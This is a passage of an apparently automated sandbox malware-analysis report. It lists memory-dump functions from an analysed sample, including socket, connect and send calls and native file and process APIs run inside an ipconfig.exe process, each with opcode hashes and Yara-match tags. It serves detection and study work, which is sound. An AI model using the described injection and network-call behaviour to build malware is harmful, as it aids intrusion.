                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID: clos$esoc$ket
                                                    • API String ID: 2781271927-3604069445
                                                    • Opcode ID: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
                                                    • Instruction ID: b13ec9eca0359b78d2bf6dcd0752040c4c876aec9eaf519fb33d65b7d825a107
                                                    • Opcode Fuzzy Hash: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
                                                    • Instruction Fuzzy Hash: 19F01D70218B089FD784EF18D484B6AB6E0FB89314F54466DB84ECB248C77585418B53
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DF7F52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: connect
                                                    • String ID: conn$ect
                                                    • API String ID: 1959786783-716201944
                                                    • Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                                    • Instruction ID: a60d91b954b7688cae433575c47bff8595170c9c4459d58b7cf1c0971a96834e
                                                    • Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                                    • Instruction Fuzzy Hash: 87014470618A0C8FCB94EF5CE448B5477E0FB59314F1541AED90DCB266C774D9818BC2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DF7F4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: connect
                                                    • String ID: conn$ect
                                                    • API String ID: 1959786783-716201944
                                                    • Opcode ID: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
                                                    • Instruction ID: 97a2a28ae9eacca38f1a0bf02fb2d4d85246d53ec96c8e8836d74b581d82db35
                                                    • Opcode Fuzzy Hash: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
                                                    • Instruction Fuzzy Hash: C8017170A18A0C8FCB94EF4CD488B54B7E0FB59315F1641AED90DDB22AC774D9818BC1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DF7ED2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: send
                                                    • String ID: send
                                                    • API String ID: 2809346765-2809346765
                                                    • Opcode ID: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
                                                    • Instruction ID: 93d96eb6e026bf3cc9a3107a182ca2821e117666a1d9584e3457e30c045b0931
                                                    • Opcode Fuzzy Hash: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
                                                    • Instruction Fuzzy Hash: BA012570618A0C8FDBD4EF1CD448B2577E0FB58314F1645AED95DCB266C670D881CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DF7DD2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID: sock
                                                    • API String ID: 98920635-2415254727
                                                    • Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                                    • Instruction ID: b66be4cbd4eb155af77009ec54955d6fbcf2b1b88fc6a40d7120ed0e6bb7fdea
                                                    • Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                                    • Instruction Fuzzy Hash: B201447061860C8FCB84EF1CD448B54BBE0FB59314F1545AED95DCB266D7B0D981CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DF7DD0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID: sock
                                                    • API String ID: 98920635-2415254727
                                                    • Opcode ID: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
                                                    • Instruction ID: 76bfcd0451520d99345faf00e9eb50930373598ac6ec5cb7c6a7386805be79fd
                                                    • Opcode Fuzzy Hash: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
                                                    • Instruction Fuzzy Hash: 04018F30618B088FCB84EF1CD448B54BBE0FB59314F1A45AED85ECB226D7B0D981CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DF8038, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID:
                                                    • API String ID: 2781271927-0
                                                    • Opcode ID: b6743f46e3f1f2eb3d075961b8be7146a43deac48baf84514c8a2ef2f0373090
                                                    • Instruction ID: 098c2f0bf11df9cb2a2b310d59710313fe21618b7e0f7723835fb1334f1831a1
                                                    • Opcode Fuzzy Hash: b6743f46e3f1f2eb3d075961b8be7146a43deac48baf84514c8a2ef2f0373090
                                                    • Instruction Fuzzy Hash: EE2108317186044BEB18EF28E84467A72D0FB99305F85467EFD8BC7286DB34D5418256
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DF02C9, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
                                                    • Instruction ID: 071147ac26b9f43d410a6dcca35b5d6198e95be23c3f38d49043c781272fe291
                                                    • Opcode Fuzzy Hash: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
                                                    • Instruction Fuzzy Hash: 8C314C74A04B09DBDF75EF2988882A9B3E1FB48304F06427E8A5D8B207C730A550CFE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: ipconfig.exe PID: 6824 Parent PID: 3424 ipconfig.exeCOMMON

                                                    Executed Functions

                                                    Function 00A19D5E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00A14B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A14B87,007A002E,00000000,00000060,00000000,00000000), ref: 00A19DAD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: 1dd9a3d7cd885e3125abb55380123d346d3c042f51c54728e01e16d3e0ac70f4
                                                    • Instruction ID: c5cf2e858817504ecdfadf04f20960fb42b51dadf3f127f28ed2435593355738
                                                    • Opcode Fuzzy Hash: 1dd9a3d7cd885e3125abb55380123d346d3c042f51c54728e01e16d3e0ac70f4
                                                    • Instruction Fuzzy Hash: C901B2B2201108AFCB18CF98DC95EEB77A9AF8C754F158248FA5DE7241C630E851CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A19D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00A14B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A14B87,007A002E,00000000,00000060,00000000,00000000), ref: 00A19DAD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction ID: 1187c5854c0afb9915b92f65c8a65003d0844e3212207dd3a078e15f733474c1
                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction Fuzzy Hash: 7AF0B2B2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A19E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtReadFile.NTDLL(00A14D42,5EB6522D,FFFFFFFF,00A14A01,?,?,00A14D42,?,00A14A01,FFFFFFFF,5EB6522D,00A14D42,?,00000000), ref: 00A19E55
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction ID: cb05f1a0ec9ddfd7c24abbb745b4c651ff5ce6671b9dc287b55ce13f808d1e6c
                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction Fuzzy Hash: 75F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE1DA7241D630E851CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A19E8C, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(00A14D20,?,?,00A14D20,00000000,FFFFFFFF), ref: 00A19EB5
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 1df484b387129ec99071a44a2406f439f2fa3388181512fe12fc512186974af2
                                                    • Instruction ID: 37ba7e9f45006bf527cd577ab44516b6a669c996897b4855d9175de3dcc9d675
                                                    • Opcode Fuzzy Hash: 1df484b387129ec99071a44a2406f439f2fa3388181512fe12fc512186974af2
                                                    • Instruction Fuzzy Hash: 15E0C271200204BBEB10EFE4CC85FEB7B68EF54760F154169FA1CAB242D130E541CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A19E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(00A14D20,?,?,00A14D20,00000000,FFFFFFFF), ref: 00A19EB5
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                    • Instruction ID: 46b91f351483c4ed3f0b29dd4d10eb3ad3721ad96fb02925302c02546a4c89fa
                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                    • Instruction Fuzzy Hash: 75D012752002146BD710EB98CC85ED7776CEF44760F154455BA5C5B242C530F54086E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2f0b5276a15747148de7c619442a146efa012d20f1ec861d5b5d890e39421475
                                                    • Instruction ID: 0067e8caa769b045b31d9d96d59a7f0d6112d547aee4c116d3785783f2f16b5e
                                                    • Opcode Fuzzy Hash: 2f0b5276a15747148de7c619442a146efa012d20f1ec861d5b5d890e39421475
                                                    • Instruction Fuzzy Hash: 2D9002712210C802D200A5A95408646000597E0341F51D125A5014595EC7A58DD17171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6b5aa947d131d31b117dd204ceb96ef30f6c68c91f752cfaa301666a71068017
                                                    • Instruction ID: a70a9b3cc584cfbe8a3e84e9cfb9a95e880f63445785daccfaf9ee0419aa98f9
                                                    • Opcode Fuzzy Hash: 6b5aa947d131d31b117dd204ceb96ef30f6c68c91f752cfaa301666a71068017
                                                    • Instruction Fuzzy Hash: 7F9002692330C402D280B169540860A000597D1242F91D529A0005598CCA558DA96361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f26b77340c1755db2da63b7527aa42cc98d78729ccfaa2e2cd92b5ec98df95af
                                                    • Instruction ID: f8f0473b85f6f09288dc5b31ba2f33719ba3ee3ee25cc16130494ff64065d881
                                                    • Opcode Fuzzy Hash: f26b77340c1755db2da63b7527aa42cc98d78729ccfaa2e2cd92b5ec98df95af
                                                    • Instruction Fuzzy Hash: 799002713311C802D210A1698404706000597D1241F51C525A0814598D87D58DD17162
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d0d9b76895845eaac8931a386b667b24ed50ab1e57174d14d56ab7dc7015e136
                                                    • Instruction ID: 437562aede35cba08cd39f9de31b2b84182199d5eb04b01f6aa4ae2647bf860c
                                                    • Opcode Fuzzy Hash: d0d9b76895845eaac8931a386b667b24ed50ab1e57174d14d56ab7dc7015e136
                                                    • Instruction Fuzzy Hash: 0D9002612318C442D300A5794C14B07000597D0343F51C229A0144594CCA558DA16561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6bc18bfd0d62daef39a55f78c90aa85511d1d52618296646bfc50fd3690c74c2
                                                    • Instruction ID: 4b94b030d70befb37e2296c6ab3f7a766a0a598cd8df39750010e708ba9f96ed
                                                    • Opcode Fuzzy Hash: 6bc18bfd0d62daef39a55f78c90aa85511d1d52618296646bfc50fd3690c74c2
                                                    • Instruction Fuzzy Hash: DC9002712210CC02D210A169840474A000597D0341F55C525A4414698D87D58DD17161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 54a769ad0156e1e69285b1a22561bb13fc9c331f2425a0c5574fd07ffccfaf18
                                                    • Instruction ID: 047f4f91719766d421a0316a84da070dff577feaccb99d472ea174c092e56ca1
                                                    • Opcode Fuzzy Hash: 54a769ad0156e1e69285b1a22561bb13fc9c331f2425a0c5574fd07ffccfaf18
                                                    • Instruction Fuzzy Hash: 7F9002712210CC42D200A1694404B46000597E0341F51C12AA0114694D8755CD917561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b32dd7c5edf9bbbf56caf8ede5492b455993a9f57ff48013cceeb73ff43b2cba
                                                    • Instruction ID: c125a20b2d60fc21ccb774173cf0c08f3c5c190a4774322ec152b85e636c63df
                                                    • Opcode Fuzzy Hash: b32dd7c5edf9bbbf56caf8ede5492b455993a9f57ff48013cceeb73ff43b2cba
                                                    • Instruction Fuzzy Hash: 9D9002B12210C802D240B1694404746000597D0341F51C125A5054594E87998ED576A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ce5488367c53bd6dad29307b65c0403a52b88b8ece745b391e5ae19cdac7b546
                                                    • Instruction ID: ae0d6c5950aac511ab51b7ed6b32640bb2975624abc73028ac195819da5f5cab
                                                    • Opcode Fuzzy Hash: ce5488367c53bd6dad29307b65c0403a52b88b8ece745b391e5ae19cdac7b546
                                                    • Instruction Fuzzy Hash: 2B9002652310C4030205E5690704507004697D5391351C135F1005590CD7618DA16161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f9b4e7ff0608d4bbb01e716d2369f35fe06a0a63446623fd87c3b0d023f3f832
                                                    • Instruction ID: 2bf172ee750366ae5324a8729d015f8aa96ed4f203205a2ccd7b01fd91202ee4
                                                    • Opcode Fuzzy Hash: f9b4e7ff0608d4bbb01e716d2369f35fe06a0a63446623fd87c3b0d023f3f832
                                                    • Instruction Fuzzy Hash: 5A9002A13610C842D200A1694414B060005D7E1341F51C129E1054594D8759CD927166
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 651c1b478a82e90f7a29e7959ec3a163de860bbbed7613b27f30f44bc6175f39
                                                    • Instruction ID: b1bb843f145af3d4be42066172dd0fa681fcb723b1c64a78d35eaea777c9ee4e
                                                    • Opcode Fuzzy Hash: 651c1b478a82e90f7a29e7959ec3a163de860bbbed7613b27f30f44bc6175f39
                                                    • Instruction Fuzzy Hash: 669002A12220C4034205B1694414616400A97E0241B51C135E10045D0DC6658DD17165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3e40dd5886857e0b78103a47b6e4751beda43f6d54a42bf71c3032946b3b6e3f
                                                    • Instruction ID: 85455793b223fde3e6f71c75b0319185baa877c3fa375492a337b5178d392a1f
                                                    • Opcode Fuzzy Hash: 3e40dd5886857e0b78103a47b6e4751beda43f6d54a42bf71c3032946b3b6e3f
                                                    • Instruction Fuzzy Hash: E09002712210C813D211A1694504707000997D0281F91C526A0414598D97968E92B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 30e2df34959df48ca0ea9c11fa174b17ba4611713c07c389a74366dffef494f5
                                                    • Instruction ID: 1b9bc8e658f16a8059cc56bd76357f4cb2bf9e21de0548dc858fded8bf894435
                                                    • Opcode Fuzzy Hash: 30e2df34959df48ca0ea9c11fa174b17ba4611713c07c389a74366dffef494f5
                                                    • Instruction Fuzzy Hash: 889002612620C5525645F16944045074006A7E0281791C126A1404990C86669D96E661
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A1A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A03AF8), ref: 00A1A09D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                    • Instruction ID: 9f2a91bb1183f64a86fb540b344f62c0b5dfcae24325806caafaa52188e6d0ba
                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                    • Instruction Fuzzy Hash: 6FE01AB12002086BD714DF59CC45EA777ACEF88750F018554B91C57241C630E9108AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A082F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A0834A
                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A0836B
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                                    • Instruction ID: 623658268a9bfb04bfc69816f631d2ae488f949051fa3738666e288c4d070bdd
                                                    • Opcode Fuzzy Hash: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                                    • Instruction Fuzzy Hash: 1901A231A8032C7BE720A698AD43FFE776CAB40F51F054118FF04BA1C1EAD4691646F6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A1A0AA, Relevance: 1.6, APIs: 1, Instructions: 51processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A1A134
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: 031632b71f2ba69030a5d943bafb50a32b626254bd08ac11305454c43b847921
                                                    • Instruction ID: f6d53cd5f20e5ca161d42db6c29bb6b77034dd2df4381c2ac65db69d2fd97a31
                                                    • Opcode Fuzzy Hash: 031632b71f2ba69030a5d943bafb50a32b626254bd08ac11305454c43b847921
                                                    • Instruction Fuzzy Hash: 4D015AB2204148ABCB24CFA9DC81DEB7BADEF9C750F058259FA5C97241C631E801CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A0ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A0AD42
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
